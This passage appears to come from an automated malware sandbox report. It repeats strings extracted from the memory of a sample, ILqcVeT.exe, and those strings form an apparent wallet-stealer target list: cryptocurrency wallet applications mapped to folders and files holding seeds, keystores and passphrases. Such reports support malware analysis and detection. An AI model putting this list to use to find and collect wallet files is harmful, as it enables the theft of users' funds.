Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonU)
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.**V*
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia 